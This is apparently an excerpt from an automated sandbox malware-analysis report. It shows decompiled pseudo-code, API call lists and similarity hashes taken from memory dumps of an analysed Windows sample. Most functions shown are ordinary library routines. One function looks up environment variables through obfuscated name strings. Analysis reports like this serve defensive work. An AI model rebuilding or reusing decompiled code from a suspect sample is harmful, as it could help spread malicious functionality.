0x00d37829
0x00d37829
0x00d37830
0x00d37848
0x00d3784e
0x00d37852
0x00000000
0x00d37854
0x00d37866
0x00d37885
0x00d37888
0x00d3789b
0x00d3789d
0x00d3789d
0x00d378a0
0x00d378a7
0x00d378aa
0x00d378af
0x00d378b3
0x00d378c0
0x00d378c5
0x00d378c5
0x00d378cf
0x00d378d6
0x00d378d6
0x00d378dd
0x00d378e2
0x00d378e9
0x00d378ee
0x00d378f1
0x00d378f8
0x00d37903
0x00d37909
0x00d37910
0x00d37868
0x00d3786a
0x00d37870
0x00000000
0x00d37870
0x00d37866
0x00d377d1
0x00d377e0
0x00d377e6
0x00d377ec
0x00000000
0x00d377ee
0x00d377f1
0x00d377fc
0x00d37805
0x00000000
0x00d37807
0x00d37807
0x00d37810
0x00d37815
0x00d37815
0x00d37805
0x00d377ec
0x00d377cf
0x00d37911
0x00d37916

APIs

__EH_prolog3_GS.LIBCMT ref: 00D37698
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00E9E2A4,00000000,00E943AC,00000000,00E92A84,00000000,?,?,00000A38,00D38639,?,00000000,00000038), ref: 00D37736
__wsplitpath_s.LIBCMT ref: 00D37763
__wsplitpath_s.LIBCMT ref: 00D37784
__wmakepath_s.LIBCMT ref: 00D377B1
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00E92A84,00000000,?,?,00000A38,00D38639,?,00000000,00000038), ref: 00D377E0
GetFileSize.KERNEL32(00000000,00000000), ref: 00D377F1
CloseHandle.KERNEL32(?), ref: 00D377FC

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: File$__wsplitpath_s$CloseCreateException@8H_prolog3_HandleModuleNameSizeThrow__wmakepath_s
String ID:
API String ID: 3070774542-0
Opcode ID: ea8671c800500f202534afeb1d9869a0d830ac4bef1e4374c15876b8021eb87a
Instruction ID: 0e6ef76cb3960fd7cf01518dec82ae5ca8ad17635d78ebdc4ab847d0b940595d
Opcode Fuzzy Hash: ea8671c800500f202534afeb1d9869a0d830ac4bef1e4374c15876b8021eb87a
Instruction Fuzzy Hash: CE61B1B2900619BEDB20AB74CC49FEE72ACEF09720F044665F515E61D0DB70AA85CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA33E1 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA33E8
std::_Lockit::_Lockit.LIBCPMT ref: 00CA33F2

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA3409

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA3412
ctype.LIBCPMT ref: 00CA342C
std::bad_exception::bad_exception.LIBCMT ref: 00CA3440
__CxxThrowException@8.LIBCMT ref: 00CA344E
std::_Facet_Register.LIBCPMT ref: 00CA3464

Strings

0Ea, xrefs: 00CA33F7, 00CA3458
bad cast, xrefs: 00CA3438

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: 0Ea$bad cast
API String ID: 2017145326-4153154834
Opcode ID: cf5127cb84d111a27260962261a44127b1e75258e6863c8ea8ec4753b7590fb0
Instruction ID: c6c602d4ca336b9b6dd6c39a97f5fd148ad1c4c184c2c83f73e43e442f33f901
Opcode Fuzzy Hash: cf5127cb84d111a27260962261a44127b1e75258e6863c8ea8ec4753b7590fb0
Instruction Fuzzy Hash: A201D272A0022A8BCF05FFA4E952AED77B4BF55324F145514F5217B191CF349F009791

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3348 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA334F
std::_Lockit::_Lockit.LIBCPMT ref: 00CA3359

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA3370

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA3379
codecvt.LIBCPMT ref: 00CA3393
std::bad_exception::bad_exception.LIBCMT ref: 00CA33A7
__CxxThrowException@8.LIBCMT ref: 00CA33B5
std::_Facet_Register.LIBCPMT ref: 00CA33CB

Strings

bad cast, xrefs: 00CA339F
`{b, xrefs: 00CA335E, 00CA33BF

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: `{b$bad cast
API String ID: 1757418035-1524407303
Opcode ID: 78bc00eba9bf19069c9165a3e85427a5b70ab0079b4d6521dc8db100b3bfe28e
Instruction ID: ca5b4b61c90ba9779bf190a77ce0bc6a3eb2f8d69324d8acbd84065d4ed124fa
Opcode Fuzzy Hash: 78bc00eba9bf19069c9165a3e85427a5b70ab0079b4d6521dc8db100b3bfe28e
Instruction Fuzzy Hash: 0C01D232A0022A8BCF15FBA0E852AED77B4BF45364F140509F5217B2E1CF709F459B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA347A Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA3481
std::_Lockit::_Lockit.LIBCPMT ref: 00CA348B

Part of subcall function 00E48C15: __lock.LIBCMT ref: 00E48C26

int.LIBCPMT ref: 00CA34A2

Part of subcall function 00CA51EE: std::_Lockit::_Lockit.LIBCPMT ref: 00CA51FF

std::locale::_Getfacet.LIBCPMT ref: 00CA34AB
ctype.LIBCPMT ref: 00CA34C5
std::bad_exception::bad_exception.LIBCMT ref: 00CA34D9
__CxxThrowException@8.LIBCMT ref: 00CA34E7
std::_Facet_Register.LIBCPMT ref: 00CA34FD

Strings

bad cast, xrefs: 00CA34D1
(f`, xrefs: 00CA3490, 00CA34F1

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: (f`$bad cast
API String ID: 2017145326-220464376
Opcode ID: 31a22cd65361462fe2e6315caf128135705da2849356ccb4a121e3643b3a7c9e
Instruction ID: 62581c9029875fb9a7c0710134e7cc66317578845d2f03dffcaaf35cebd686bb
Opcode Fuzzy Hash: 31a22cd65361462fe2e6315caf128135705da2849356ccb4a121e3643b3a7c9e
Instruction Fuzzy Hash: 4D01C032A0022A9BCF15FBA0E852AED77B4BF45324F280104F4257B291CF349F449791

Uniqueness

Uniqueness Score: -1.00%

Function 00D38061 Relevance: 15.2, APIs: 10, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00D38061() {
				signed int _t87;
				void* _t89;
				void* _t93;
				int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				long _t100;
				void* _t106;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				int _t114;
				int _t115;
				signed int _t116;
				int _t120;
				int _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				void* _t126;
				int _t127;
				signed int _t129;
				int _t131;
				signed int _t134;
				int _t135;
				void** _t136;
				int _t138;
				int _t140;
				int _t142;
				void* _t143;
				signed int _t144;
				void* _t145;

				0xe21503(0xa8);
				_t136 =  *(_t145 + 8);
				_t112 =  *(_t145 + 0xc);
				 *(_t145 - 0x80) = _t112;
				if( *_t136 != 0) {
					if(GetObjectW( *_t136, 0x18, _t145 - 0xb4) != 0) {
						_t116 =  *(_t145 - 0xb0);
						 *(_t145 - 0x6c) =  *(_t145 - 0xac);
						_t87 = _t116;
						asm("cdq");
						_t124 = _t87 % _t112;
						_t113 = _t87 / _t112;
						 *(_t145 - 0x84) = _t116;
						_t89 = 0x20;
						 *(_t145 - 0x7c) = _t113;
						if( *((intOrPtr*)(_t145 - 0xa2)) != _t89) {
							E00D19EF3(_t145 - 0x9c);
							_t131 = 0;
							 *(_t145 - 4) = 0;
							E00D1A8A4(_t113, _t145 - 0x9c, _t124, CreateCompatibleDC(0));
							if( *_t136 == 0) {
								_t93 = 0;
								 *(_t145 - 0x78) = 0;
							} else {
								_t93 = SelectObject( *(_t145 - 0x98),  *_t136);
								 *(_t145 - 0x78) = _t93;
							}
							if(_t93 != 0) {
								if(_t113 > 0) {
									_t97 =  *(_t145 - 0x80);
									_t120 = _t131;
									_t125 =  *(_t145 - 0x6c);
									 *(_t145 - 0x74) = _t120;
									do {
										 *(_t145 - 0x8c) = _t131;
										if(_t125 > 0) {
											_t55 = _t120 - 1; // -1
											_t138 = _t55 + _t97;
											asm("cdq");
											_t98 = _t97 - _t125;
											 *(_t145 - 0x88) = _t138;
											_t125 =  *(_t145 - 0x6c);
											_t99 = _t98 >> 1;
											 *(_t145 - 0x84) = _t99;
											do {
												 *(_t145 - 0x68) = _t138;
												_t114 = _t120;
												if(_t99 > 0) {
													 *(_t145 - 0x70) = _t99;
													do {
														_t100 = GetPixel( *(_t145 - 0x98), _t114, _t131);
														SetPixel( *(_t145 - 0x98), _t114, _t131, GetPixel( *(_t145 - 0x98),  *(_t145 - 0x68), _t131));
														_t140 =  *(_t145 - 0x68);
														SetPixel( *(_t145 - 0x98), _t140, _t131, _t100);
														_t114 = _t114 + 1;
														_t67 = _t145 - 0x70;
														 *_t67 =  *(_t145 - 0x70) - 1;
														 *(_t145 - 0x68) = _t140 - 1;
													} while ( *_t67 != 0);
													_t120 =  *(_t145 - 0x74);
													_t99 =  *(_t145 - 0x84);
													_t125 =  *(_t145 - 0x6c);
													_t138 =  *(_t145 - 0x88);
												}
												_t131 = _t131 + 1;
											} while (_t131 < _t125);
											_t113 =  *(_t145 - 0x7c);
											_t131 = 0;
											_t97 =  *(_t145 - 0x80);
										}
										_t120 = _t120 + _t97;
										_t113 = _t113 - 1;
										 *(_t145 - 0x74) = _t120;
										 *(_t145 - 0x7c) = _t113;
									} while (_t113 != 0);
									_t93 =  *(_t145 - 0x78);
								}
								SelectObject( *(_t145 - 0x98), _t93);
								_t131 = 1;
							}
							 *(_t145 - 4) =  *(_t145 - 4) | 0xffffffff;
							E00D1A049(_t145 - 0x9c);
							_t95 = _t131;
						} else {
							if(GetObjectW( *_t136, 0x54, _t145 - 0x64) == 0) {
								goto L3;
							} else {
								_t106 = 0x20;
								if( *((intOrPtr*)(_t145 - 0x52)) != _t106) {
									goto L3;
								} else {
									_t142 =  *(_t145 - 0x50);
									 *(_t145 - 0x74) = _t142;
									if(_t142 == 0) {
										goto L3;
									} else {
										if(_t113 > 0) {
											_t108 =  *(_t145 - 0x80);
											_t126 =  *(_t145 - 0x6c);
											_t134 = _t108 << 2;
											_t122 = _t142 - 4 + _t134;
											 *(_t145 - 0x8c) = _t134;
											 *(_t145 - 0x70) = _t122;
											do {
												if(_t126 > 0) {
													asm("cdq");
													_t115 = _t142;
													_t143 =  *(_t145 - 0x6c);
													_t110 = _t108 - _t126 >> 1;
													 *(_t145 - 0x88) = _t110;
													 *(_t145 - 0x68) = _t122;
													 *(_t145 - 0x78) = _t143;
													do {
														_t127 = _t115;
														_t135 = _t122;
														if(_t110 > 0) {
															_t144 = _t110;
															do {
																_t123 =  *_t127;
																 *_t127 =  *_t135;
																_t127 = _t127 + 4;
																 *_t135 = _t123;
																_t135 = _t135 - 4;
																_t144 = _t144 - 1;
															} while (_t144 != 0);
															_t110 =  *(_t145 - 0x88);
															_t122 =  *(_t145 - 0x68);
															_t143 =  *(_t145 - 0x78);
														}
														_t129 =  *(_t145 - 0x84) << 2;
														_t122 = _t122 + _t129;
														_t115 = _t115 + _t129;
														_t143 = _t143 - 1;
														 *(_t145 - 0x68) = _t122;
														 *(_t145 - 0x78) = _t143;
													} while (_t143 != 0);
													_t142 =  *(_t145 - 0x74);
													_t113 =  *(_t145 - 0x7c);
													_t134 =  *(_t145 - 0x8c);
													_t108 =  *(_t145 - 0x80);
													_t122 =  *(_t145 - 0x70);
													_t126 =  *(_t145 - 0x6c);
												}
												_t142 = _t142 + _t134;
												_t122 = _t122 + _t134;
												_t113 = _t113 - 1;
												 *(_t145 - 0x74) = _t142;
												 *(_t145 - 0x70) = _t122;
												 *(_t145 - 0x7c) = _t113;
											} while (_t113 != 0);
										}
										goto L1;
										L39:
									}
								}
							}
						}
					} else {
						L3:
						_t95 = 0;
					}
				} else {
					L1:
					_t95 = 1;
				}
				0xe214b2();
				return _t95;
				goto L39;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00D3806B
GetObjectW.GDI32(?,00000018,?,000000A8,00D38652,?,00000010,00000038,00D375CE), ref: 00D38097

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_Object
String ID:
API String ID: 2214263146-0
Opcode ID: 410fbd72a643b46b8e413cf1eb771177c78c869adf0df5f7764704a7e7684308
Instruction ID: 163e7e74c7cdf0a295b6e298cb85cb3bfc67dc6e77fcf6d3f7c88dc9ff4e0741
Opcode Fuzzy Hash: 410fbd72a643b46b8e413cf1eb771177c78c869adf0df5f7764704a7e7684308
Instruction Fuzzy Hash: F1811775E003298FDB24CFA9CC80A9EBBB5FF58300F248169E959A7311DA709D85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D0C136 Relevance: 15.1, APIs: 10, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D0C136(signed int _a4) {
				struct HMENU__* _v0;
				signed int _v4;
				struct HMENU__* _v8;
				signed int _v16;
				int _v20;
				int _t31;
				struct HMENU__* _t34;
				signed int _t36;
				int _t38;
				int _t40;
				signed int _t41;
				int _t43;

				0xe214d0();
				_t41 = E00D0BC90(0xe80186, 0xc);
				_t36 = 4;
				_v16 = _t41;
				_v4 = _v4 & 0x00000000;
				if(_t41 == 0) {
					_t41 = 0;
				} else {
					_t36 = _t41;
					E00D0BCEF(_t36);
					 *(_t41 + 8) =  *(_t41 + 8) & 0x00000000;
					 *_t41 = 0xe9e480;
				}
				_v16 = _v16 | 0xffffffff;
				 *(_t41 + 8) = _v4;
				_v4 = _t41;
				0xe2143b( &_v4, 0xee9fd4);
				asm("int3");
				_push(_t36);
				_push(_t36);
				_push(_t41);
				_v20 = GetMenuItemCount(_v4);
				_t31 = GetMenuItemCount(_v8);
				_t43 = _t31 - 1;
				if(_t43 >= 0) {
					do {
						_t31 = GetSubMenu(_v4, _t43);
						_t34 = _t31;
						if(_t34 != 0) {
							if(_a4 == 0) {
								_t38 = 0;
								if(_v16 > 0) {
									while(1) {
										_t31 = GetSubMenu(_v0, _t38);
										if(_t31 == _t34) {
											break;
										}
										_t38 = _t38 + 1;
										if(_t38 < _v16) {
											continue;
										} else {
										}
										goto L17;
									}
									_t31 = RemoveMenu(_v4, _t43, 0x400);
								}
							} else {
								_t31 = GetMenuItemCount(_t34);
								_t40 = 0;
								_v20 = _t31;
								if(_t31 > 0) {
									while(1) {
										_t31 = GetSubMenu(_t34, _t40);
										if(_t31 == _a4) {
											break;
										}
										_t40 = _t40 + 1;
										if(_t40 < _v20) {
											continue;
										} else {
										}
										goto L17;
									}
									_t31 = RemoveMenu(_t34, _t40, 0x400);
									_a4 = _a4 & 0x00000000;
								}
							}
						}
						L17:
						_t43 = _t43 - 1;
					} while (_t43 >= 0);
				}
				return _t31;
			}

APIs

__EH_prolog3.LIBCMT ref: 00D0C13D

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

__CxxThrowException@8.LIBCMT ref: 00D0C182
GetMenuItemCount.USER32(?), ref: 00D0C191
GetMenuItemCount.USER32(8007000E), ref: 00D0C19D
GetSubMenu.USER32(8007000E,-00000001), ref: 00D0C1B2
GetMenuItemCount.USER32(00000000), ref: 00D0C1C5
GetSubMenu.USER32(00000000,00000000), ref: 00D0C1D6
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,8007000E,00EE9FD4,00000004,00CA5A8C,8007000E,?,00CA36CE,80004005), ref: 00D0C1F0

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Menu$CountItem$Exception@8H_prolog3RemoveThrow_malloc
String ID:
API String ID: 638606686-0
Opcode ID: 28cf980f42dca72f9aef51465737a6cac7f684981601a1cdc41dc7bb5ee167f5
Instruction ID: 6e228a97827a558f3ca1d6a50b2b5723c0f22fc9cf6f121b7e78acb7a28aa5cb
Opcode Fuzzy Hash: 28cf980f42dca72f9aef51465737a6cac7f684981601a1cdc41dc7bb5ee167f5
Instruction Fuzzy Hash: E831BF31510314FBDB11AFA1DC09B9E7BF4EB40711F245219F91DA62A1C7709A40DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D42E Relevance: 13.6, APIs: 9, Instructions: 101
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00D0D42E(long* __ecx) {
				void* _t38;
				long* _t41;
				long _t42;
				void* _t43;
				long _t53;
				signed int _t54;
				int _t55;
				void* _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				long* _t64;
				void* _t65;
				void* _t66;
				long* _t67;
				void* _t68;

				_t56 = __ecx;
				0xe21539(0x10);
				_t67 = __ecx;
				 *(_t68 - 0x18) = __ecx;
				_t64 =  &(__ecx[7]);
				 *(_t68 - 0x14) = _t64;
				 *0xe8e4d8(_t64);
				_t54 =  *(_t68 + 8);
				if(_t54 <= 0 || _t54 >= __ecx[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *__ecx);
					if(_t65 == 0) {
						_t55 = 0;
						 *(_t68 - 4) = 0;
						_t66 = E00D0D0A9(0x10);
						if(_t66 == 0) {
							_t66 = 0;
						} else {
							 *_t66 = 0xe9e5e0;
						}
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						 *(_t66 + 8) = _t55;
						 *(_t66 + 0xc) = _t55;
						_t41 = E00D0D35E( &(_t67[5]), _t66);
						_t56 = _t67[5];
						 *_t41 = _t67[5];
						_t67[5] = _t66;
						_t67 =  *(_t68 - 0x18);
						goto L10;
					} else {
						if(_t54 >=  *((intOrPtr*)(_t65 + 8)) &&  *((intOrPtr*)(_t68 + 0xc)) != 0) {
							_t55 = 0;
							L10:
							if( *(_t66 + 0xc) != _t55) {
								_t42 = E00D0C969(_t55, _t56, _t66, _t67, _t67[3], 4);
								_t59 = 2;
								_t43 = LocalReAlloc( *(_t66 + 0xc), _t42, ??);
							} else {
								_t53 = E00D0C969(_t55, _t56, _t66, _t67, _t67[3], 4);
								_pop(_t59);
								_t43 = LocalAlloc(_t55, _t53);
							}
							_t63 = _t43;
							if(_t63 == 0) {
								 *0xe8e4d4( *(_t68 - 0x14));
								E00D0BD23(_t59);
							}
							_t60 =  *(_t66 + 8);
							 *(_t66 + 0xc) = _t63;
							0xe23f30(_t63 + _t60 * 4, _t55, _t67[3] - _t60 << 2);
							 *(_t66 + 8) = _t67[3];
							TlsSetValue( *_t67, _t66);
							_t54 =  *(_t68 + 8);
						}
					}
					_t61 =  *(_t66 + 0xc);
					if(_t61 != 0 && _t54 <  *(_t66 + 8)) {
						 *((intOrPtr*)(_t61 + _t54 * 4)) =  *((intOrPtr*)(_t68 + 0xc));
					}
					_push( *(_t68 - 0x14));
				}
				_t38 =  *0xe8e4d4();
				0xe2149e();
				return _t38;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 00D0D435
RtlEnterCriticalSection.NTDLL(?), ref: 00D0D446
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?,?,?,00CA5C95,?,?,00CA36FB), ref: 00D0D462
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D4D2
LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D4EC
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D4FB
_memset.LIBCMT ref: 00D0D51A
TlsSetValue.KERNEL32(?,00000000), ref: 00D0D52B
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D562

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$EnterH_prolog3_catch_memset
String ID:
API String ID: 4057217241-0
Opcode ID: adece7441fc1106a35ac00e81eecebc005d78a95c2fcc853c512c8d0a45ce5ae
Instruction ID: d7a090c7ff6bc32a78b1bc7387e59d9c63912a265a425404ae32db285fa2c0d5
Opcode Fuzzy Hash: adece7441fc1106a35ac00e81eecebc005d78a95c2fcc853c512c8d0a45ce5ae
Instruction Fuzzy Hash: AF319F70500705EFD7259F95E885A2AFBB6FF40314B20852EE95EA76A0DB31E914CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00CA78EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CA78EE(void* __ecx, void* __eflags) {
				void* _t27;
				intOrPtr _t37;
				signed int _t46;
				intOrPtr _t47;
				signed int _t48;
				intOrPtr _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				0xe21503(0x17c);
				_t47 =  *((intOrPtr*)(_t64 + 8));
				_t62 =  *((intOrPtr*)(_t64 + 0xc));
				_t27 = E00D095A9(__ecx, L"IIDIEK[\\IO[Q");
				0xe24b10(_t27, 0);
				_t66 = _t65 + 0xc;
				if(_t27 != 0) {
					L3:
					E00CA3D46(_t64 - 0x28, _t27);
					 *(_t64 - 4) =  *(_t64 - 4) & 0x00000000;
					_push(0);
					E00CA7590(_t64 - 0x28, __eflags, _t29, E00CA9A45(E00D095A9(_t64 - 0x28, 0xe93b40)));
					E00CA7590(_t64 - 0x28, __eflags, _t47, E00CA9A45(_t47));
					_push(1);
					_push(0x40);
					_push(0x21);
					_push(_t64 - 0x28);
					L00CA3949(_t64 - 0xe0);
					 *(_t64 - 4) = 1;
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t64 - 0xe0)) + 4));
					__eflags =  *(_t64 + _t37 - 0xd4) & 0x00000006;
					if(( *(_t64 + _t37 - 0xd4) & 0x00000006) == 0) {
						_push(1);
						_push(0x40);
						_push(0x22);
						_push(_t62);
						E00CA3B57(_t64 - 0x188);
						 *(_t64 - 4) = 2;
						_push(_t64 - 0xd0);
						E00CA5071(_t64 - 0x188, __eflags);
						E00CA789A(_t64 - 0x188, __eflags);
						E00CA7868(_t64 - 0xe0, __eflags);
						_t48 = 1;
						E00CA52B1(_t64 - 0x188);
					} else {
						_t48 = 0;
					}
					E00CA5225(_t64 - 0xe0);
					E00CA71CD(_t64 - 0x28, 1, 0);
					_t46 = _t48;
				} else {
					_t27 = E00D095A9(__ecx, L"DVWLH^J");
					0xe24b10(_t27, _t27);
					_t66 = _t66 + 0xc;
					if(_t27 != 0) {
						goto L3;
					} else {
						_t46 = 0;
					}
				}
				0xe214b2();
				return _t46;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA78F8
__wgetenv.LIBCMT ref: 00CA7910
__wgetenv.LIBCMT ref: 00CA7928

Part of subcall function 00E24B10: _wcsnlen.LIBCMT ref: 00E24B49
Part of subcall function 00E24B10: __lock.LIBCMT ref: 00E24B5A
Part of subcall function 00E24B10: __wgetenv_helper_nolock.LIBCMT ref: 00E24B65

char_traits.LIBCPMT ref: 00CA7957
char_traits.LIBCPMT ref: 00CA796A

Strings

DVWLH^J, xrefs: 00CA791D
IIDIEK[\IO[Q, xrefs: 00CA7905

Memory Dump Source

